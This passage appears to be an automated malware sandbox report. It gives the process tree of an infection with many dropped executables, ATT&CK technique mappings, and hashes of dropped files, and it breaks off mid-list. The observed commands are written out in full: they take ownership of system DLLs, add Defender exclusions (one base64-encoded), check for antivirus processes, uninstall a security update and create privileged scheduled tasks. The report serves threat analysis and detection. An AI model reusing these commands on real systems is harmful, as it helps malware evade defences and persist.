        takeown /f C:\Windows\SysWOW64\sppwmi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4124
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\sppwmi.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1000
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\systemcpl.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6244
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\systemcpl.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4292
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\user32.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4328
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\user32.dll /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4376
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\winver.exe
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\winver.exe /grant everyone:f
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4468
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\sppcomapi.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4536
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\sppcomapi.dll /deny users:(X)
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5496
    - - C:\Windows\system32\regedt32.exe
        
        C:\Windows\Sysnative\regedt32.exe /s MuiCache.reg
        5⤵
        
        PID:5036
      - C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s MuiCache.reg
        6⤵
        Runs .reg file with regedit
        
        PID:5100
    - - C:\Windows\system32\control.exe
        
        C:\Windows\Sysnative\control.exe /name Microsoft.System
        5⤵
        
        PID:5184
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        5⤵
        Runs ping.exe
        
        PID:6672
    - - C:\Windows\system32\regedt32.exe
        
        C:\Windows\Sysnative\regedt32.exe /s ShowCmd.reg
        5⤵
        
        PID:8316
      - C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s ShowCmd.reg
        6⤵
        Runs .reg file with regedit
        
        PID:8376
- C:\Users\Admin\AppData\Local\Temp\a\client.exe
  "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
  2⤵
  PID:5332
- - C:\Windows\system32\Client.exe
    "C:\Windows\system32\Client.exe"
    3⤵
    PID:7416
- C:\Users\Admin\AppData\Local\Temp\a\reverse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"
  2⤵
  PID:7244
- C:\Users\Admin\AppData\Local\Temp\a\64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\64.exe"
  2⤵
  PID:7512
- - C:\Windows\system32\cmd.exe
    cmd
    3⤵
    PID:7736
- C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fd1.exe"
  2⤵
  PID:5060
- - C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
    C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
    3⤵
    PID:3528
- C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe"
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYQBcAG0AcwBmAGkAbABlAHIALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAG0AcwBmAGkAbABlAHIALgBlAHgAZQA7AA==
    3⤵
    PID:552
- - C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
    C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
    3⤵
    PID:6232
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5016
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msfiler.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6376
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7440
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mdnsresp.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3708
- C:\Users\Admin\AppData\Local\Temp\a\msmng2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\msmng2.exe"
  2⤵
  PID:7884
- C:\Users\Admin\AppData\Local\Temp\a\test.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
  2⤵
  PID:7972
- C:\Users\Admin\AppData\Local\Temp\a\cmd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cmd.exe"
  2⤵
  PID:2272
- C:\Users\Admin\AppData\Local\Temp\a\cmt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cmt.exe"
  2⤵
  PID:1748
- C:\Users\Admin\AppData\Local\Temp\a\findlawthose.exe
  "C:\Users\Admin\AppData\Local\Temp\a\findlawthose.exe"
  2⤵
  PID:5228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Bullet Bullet.cmd & Bullet.cmd & exit
    3⤵
    PID:5892
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:7148
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:6900
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3504
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:6428
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 336133
      4⤵
      PID:3644
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "EFFICIENCYORLANDOOUTCOMESONS" Yours
      4⤵
      PID:6676
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Interface + Hacker + Accessory + Materials + Fox 336133\P
      4⤵
      PID:4008
  - - C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336133\Joint.pif
      336133\Joint.pif 336133\P
      4⤵
      PID:7520
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 127.0.0.1
      4⤵
      Runs ping.exe
      PID:3776
- C:\Users\Admin\AppData\Local\Temp\a\pub11.exe
  "C:\Users\Admin\AppData\Local\Temp\a\pub11.exe"
  2⤵
  PID:8624
- C:\Users\Admin\AppData\Local\Temp\a\888.exe
  "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
  2⤵
  PID:5108
- - C:\Users\Admin\AppData\Local\Temp\a\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:1576
- C:\Users\Admin\AppData\Local\Temp\a\univ.exe
  "C:\Users\Admin\AppData\Local\Temp\a\univ.exe"
  2⤵
  PID:5616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "univ.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\univ.exe" & exit
    3⤵
    PID:3588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "univ.exe" /f
      4⤵
      Kills process with taskkill
      PID:3628
- C:\Users\Admin\AppData\Local\Temp\a\nine.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nine.exe"
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 156
    3⤵
    - Program crash
    PID:6460
- C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
  2⤵
  PID:3944
- C:\Users\Admin\AppData\Local\Temp\a\my.exe
  "C:\Users\Admin\AppData\Local\Temp\a\my.exe"
  2⤵
  PID:6240
- C:\Users\Admin\AppData\Local\Temp\a\yar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\yar.exe"
  2⤵
  PID:7292
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5600
- C:\Users\Admin\AppData\Local\Temp\a\DbVisualizer_Pro.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DbVisualizer_Pro.exe"
  2⤵
  PID:7596

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3772
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3788
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3816
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3840
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:764
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3868
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4208

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:5864

C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
1⤵
PID:5904
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6364
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:7196
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:6444
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:6496
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:6532
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:6620
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6640
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:6948

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:8732

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240522091638.log C:\Windows\Logs\CBS\CbsPersist_20240522091638.cab
1⤵
PID:8616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:5068
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Windows Upgrade Manager" /tr "'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe'"
  2⤵
  - Creates scheduled task(s)
  PID:4820

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:6248

C:\Windows\system32\taskeng.exe
taskeng.exe {FF7627D1-47DC-4008-8B0A-305CFF9BEB3C} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
1⤵
PID:6884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
103edaed54b10d1d246102e9d8a9c6fe

SHA1
22ede5ed6d3dfae5e98abfe413bbc7a63e16aca1

SHA256
1106a818494c2d470bde10b094c5ee03888b72b09ebfb298d60f10327130d6f3

SHA512
0cebe8193c102aa8f3c388ebcb569b357e4a4d31b746e92e8bcf4f7fd36bb3ebcad3d54f0204aefe6582ef5d9cc60abb1d21b950f872cb57e1edf63ed1082e8d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
65c4f7fd358e43f7f698007d67bd755f

SHA1
464cf4140c4ddba3345bd238a0246c329eb7c525

SHA256
e95c573a93373e9cb49a5d6be76630694967b81040abef8ecb71545b76837ca6

SHA512
a213003f22c4a9323caaca16203c801d2e1903de8a133d56426b51afc24877d945d95506b8fc7fa821c6d5c9d57688893cf2bf425d74b96a00602fa035d52265

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
eafc8b60c4ffd51f22cfffb62779beff

SHA1
d5e69a26eb78fa917f467881209c930825c7db5e

SHA256
63137f3a2a1e55c6e3bf40a93838ff528ba22fca6f43f327be55fe8f67c31b68

SHA512
b33cabb2e1d2afdead17d091eda1543b411f420858c311ea585fd7915edaa10a0731a2e5461621ea8c93244614318831c317255460f96576d6eba0befc74fd24

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
40252994b45db38f889efd8d36bea839

SHA1
abfdf854e11e067b54bc60fffafc6535dd522122

SHA256
b0d3d0d661f2223fe148899bc18d311306efe221f2a3d8ec403695f0e5e62b09

SHA512
f670c61f66391f71ff51e3aa692960a846bc28f5b7fafa6208de1e0cab6c929777f2b6669d678543726fed20ad5bc6c740591a820bfb5af3ec921a38c9a3f2ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
490f24ff2e434dccde8f60f2d5b6615f

SHA1
cd0d558fa4a872c71563bea91adcd2829f16a711

SHA256
9e6b7b34e8d2142f0d7c82c639080109fd04b0bc4e744be3e6252b3859e7699b

SHA512
2ca3222a5f20b9134364f6e7e6f8c4c84a0c1c27216394cfe3993e73ce3d3f49ad3e024628e0899bd1b6080b407db00b3dff53327a46098bac191ba4349ba8e0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
ef62daf4271b2351f9ff9052dbab7a6a

SHA1
8d111b98b74493ea186aeea064597881a4cc1f02

SHA256
6409ae1050b597c393e150d78fffaa57ca353e5295c2742d30160a51724ba441

SHA512
4561cc1e7bdc3d0a27179cc55642494e175d13077ff59448415147a5b2fff6d2cd464fdc32a29c13d60573c822f9c9ad6e25f549bae82a917b20bcea755cda10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336133\Joint.pif

Filesize
925KB

MD5
62d09f076e6e0240548c2f837536a46a

SHA1
26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

SHA256
1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

SHA512
32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1212912448.exe

Filesize
93KB

MD5
a318cc45e79498b93e40d5e5b9b76be4

SHA1
4ebc9969cc3c330741c377e22a5fb0cdb8ce5fd5

SHA256
4b4e596641d0dd9eece8a24556fd1246056cbc315a79675a7400927858bbd7c2

SHA512
3131d627837a3cafdf532173ccadd4beff933ee3d5e050366153434b1394c4d57056b4d273ddb826a1a0478caa83e1f6e095e83366102ae1d3705ab2d3ec0e2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\2300410305.exe

Filesize
8KB

MD5
87b22e975994246dc5b7c2a3adbf85a5

SHA1
1e6528987190f0f5188240cdac553388c39e8590

SHA256
17399263a05a9144c1571e8ef88175fd08c61a38e3fcb3a955279d4a2bb9a919

SHA512
58c33379879fc75679902d1fe3db0bf1c854151cb6e4bf10496a1d657a8778699be70976bd8bba1ddd3949b24b6ae44cbc0421dd0a8cea13ef5e00179d6599db

Download Submit
C:\Users\Admin\AppData\Local\Temp\2501326462.exe

Filesize
8KB

MD5
11d2f27fb4f0c424ab696573e79db18c

SHA1
d08ece21a657bfa6ea4d2db9b21fbb960d7f4331

SHA256
dee9dca027009b7d2885ace7b968d2e9505a41b34756b08343338f8ef259e9be

SHA512
a60de41caa6113430ab4ab944b800579f574f9b964c362f9c62bbfc1bd85dccd01b628809367e15cfe6baaba32c1255f8db07e434ff7bcf5e90d9b3d1f6a4cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\3154120795.exe

Filesize
11KB

MD5
cafd277c4132f5d0f202e7ea07a27d5c

SHA1
72c8c16a94cce56a3e01d91bc1276dafc65b351d

SHA256
e5162fa594811f0f01fc76f4acbd9fe99b2265df9cfcbc346023f28775c19f1e

SHA512
7c87d1dec61b78e0f223e8f9fec019d96509813fa6d96129289aab00b2d6f05bf91fe1fafd680b7d9e746f4c2c8cbe48a3028bcaad479048d00d79a19f71b196

Download Submit
C:\Users\Admin\AppData\Local\Temp\322829355.exe

Filesize
10KB

MD5
47340d40e7f73e62cf09ac60fd16ad68

SHA1
effd38f6561155802d3e5090f5714589eae5ce6e

SHA256
e8a0c46342abd882318dbfdb17b7d3cb93d7138564878a15c5b91229ed81689c

SHA512
2d5fbacad67eba3c42c2be95c3bf64d787d15cf96d5afe827d6f9bdb175295859e684202ff5afc773202f4b9d0b3135e913c997bbe72026cd7a7ca96ecf5aa08

Download Submit
C:\Users\Admin\AppData\Local\Temp\496d4c71

Filesize
1.7MB

MD5
3db39aa30df77ddcb2e5b50998a869f4

SHA1
fcfaa9cadaf8332aa6eb4c438036ff17a2899cc9

SHA256
57387226ddda11faf8909e4edd47ae3d4edac978c035308ba63a5686e580e52a

SHA512
596e9833febcdb4c1e84d79258cb305618a252f35d4760be7be695c7abe4ee014b085a7afc33fc6252f0c93affcc8ca405915b8942bd41e736c3a3cf3ab48ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\4c84f31f

Filesize
1.7MB

MD5
3aaa7a5e02e544635c660b6007998d1f

SHA1
eb5bd0e31ec714ae21cca9f442bbd88ce65c32d0

SHA256
0046db365ef0882c6fa863623f33732086968c08e73700a2d00d7ca64f143e3f

SHA512
5a997fefbb78710dd09f1e552cee4f793101307be0f71ab3a9af3c92492fbdbb201c12f000104f8a354e0e44706fe50ed356ec04f78da62edc8206596aa5124a

Download Submit
C:\Users\Admin\AppData\Local\Temp\53731040.exe

Filesize
10KB

MD5
c8cf446ead193a3807472fbd294c5f23

SHA1
2162f28c919222f75ce5f52e4bb1155255ae5368

SHA256
e5d12658a690c62af7d4fc7b26735affc7210e3bfb6b2241de1bf90aebdc0717

SHA512
fc94014fabf204ecd57990db4b05b81cbda0a314b621cbfa755296ddf5493ec55fb129d12eff5f92863d9f1d7fea679dc2aeb62baf898791448cb4fe34b595c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF

Filesize
14KB

MD5
a407c54a89a1dc65074b2f09b8664f34

SHA1
b7d984e56575de4fe305e3b2b386f20810e69953

SHA256
938d9f85529b66633c6174ebc191774836d5627ca00522934ce67d893f2078f0

SHA512
7cad8abee45167e807c2ee399e8ea0287be5686853a20ea929b4ae9a2229bc11623ef3087c58355d124dd2841a5e7afd852fc746041bd5e3b5fe787326509da6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar237F.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe

Filesize
20KB

MD5
de36bc2bfc3c67820ebd75c912fadc3d

SHA1
38bd51e1052ae5bede5293827e87d6f494b204c8

SHA256
2a5083d6e55f5cb56764fc4ed7ad082a0ef75a908ed03132178cc80f802c3d16

SHA512
efbc8a797e95f00c142c4c02c2f3faf4f46fabcdcd1a99d81df7581244a22f0b81f846d15de3b5f4b6d323deff555fd569db57aff3171ffebf27c03e4d53e6ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\64.exe

Filesize
7KB

MD5
e1517885f6c71f7b3dafa6d4610c4762

SHA1
01edbfd0a59d9addad0f30c5777351c484c1fcd1

SHA256
4456f9a5d25296d8e6e184d50ec5355f01848263ce32e8379120a1077194a5ba

SHA512
4c947836d668dac764f0945c3438a0e1aae6c647560907a96096a6af9795a4b753f1c138e526d06029d364a28e900cbca07566c56df14764d232e3bacbca6c93

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe

Filesize
436KB

MD5
46fc9e5e1fbeed55281cd5f25310f8d3

SHA1
be6bb9f76a2545781a628690602eab704ce1e64b

SHA256
0494a21fd6ec0405206dbe6c82525b895f09ff4c240a301e1baae682c5ad80a2

SHA512
c7b3a65f50a6e0bffea72a215fa717378c93d767d287c711912dda55dff6294bd2266a502cfe80aea4c6bdaae03170bd5b50bdcc175bcd146c6a79ed7bee0b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

Filesize
5.0MB

MD5
a4e84bdb6fba7b3c5689b0f2bc5ec858

SHA1
6ef4aaf5a594b23cb64e168824b1fc2376cf6c5e

SHA256
48605846c229a73a9695d0a6567982bb558e5108b2251b74ad2cdba66e332632

SHA512
c2241abab28b6d31f33fb17b89983fbfdfe03d55ca1078e8de29e4b56328ed5933c577c0e0865d8edcf897b9d752e8a011a22297f9d87cb683ce9f0522f763ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\alabi.exe

Filesize
435KB

MD5
794a7bc49c07d085d9e3cd15515f961d

SHA1
ba3c257dc49a4fef8f59465b179b505db096fe33

SHA256
3ba0f4f8645247e4f440e38ca2b0f91bed5d239452e97054e75e25d371ec4d98

SHA512
6d56bbe23e395fa4839bc96e4632e6e98b2834b0a11fb34322c96f50a2b734f7a0d00f2c5b458766e389c739c3d5d03fec661038737ff6c340e3a7754a6b2f97

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\cmt.exe

Filesize
8KB

MD5
dc0d40579447b035d980cf0b8cd7667c

SHA1
c907f983cb27d5caec6c941e0712afcc973487d0

SHA256
36ed94fb9f8ef3f5cbf8494ff6400d0be353ae7c223ed209bd85d466d1ba1ff7

SHA512
ed37522b52b617877b5e5f7023a0138baf396c0b33393d6155dbb6bfa4b3347b737e5493cbde634fa1937d0094a7b9b543929e6f32b35331a8c6dc838f38d51b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\conhost.exe

Filesize
2.5MB

MD5
be320b59ef29060678bcb78d6c8fa059

SHA1
eb76091dc908c5bcf1ddd24900f53b6d9119bf53

SHA256
9fdadcad0d51590fd9b604d464cdac18c9b34d43b4194c7d54110b299a841145

SHA512
8015324abb929d2ff22c1ba96bf79fe2393a16ad9daa93caef756ab41122b9e582fca68aaf8b625934aad3140223db6928a105633bb5ca209a2a3980383383fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\crt.exe

Filesize
5.2MB

MD5
1e9371c7eb8b2ad613afd09eab341887

SHA1
845e0f5c40104d431b8f690754671bd7c3531fc8

SHA256
88198ae8178cf02f541c8bd9211d73697ca68a643f1622b858063e3639e0aa27

SHA512
868574b6a840a05790b795669a02f12b73be1524c216222f79c4d1f61eed4292eecd4436aca697938e6675ebb765f5e5ca02fb6736824080dff18b112e649026

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe

Filesize
7.8MB

MD5
636ea646281c99d3d05cdefdca29cf5e

SHA1
77b6e50b8866f7b41d678995b8d448237edcddef

SHA256
01dde6eab064a347e1b0b8dc3074e7ac96203e1bbd1bec7cddf4b6fdfadee61c

SHA512
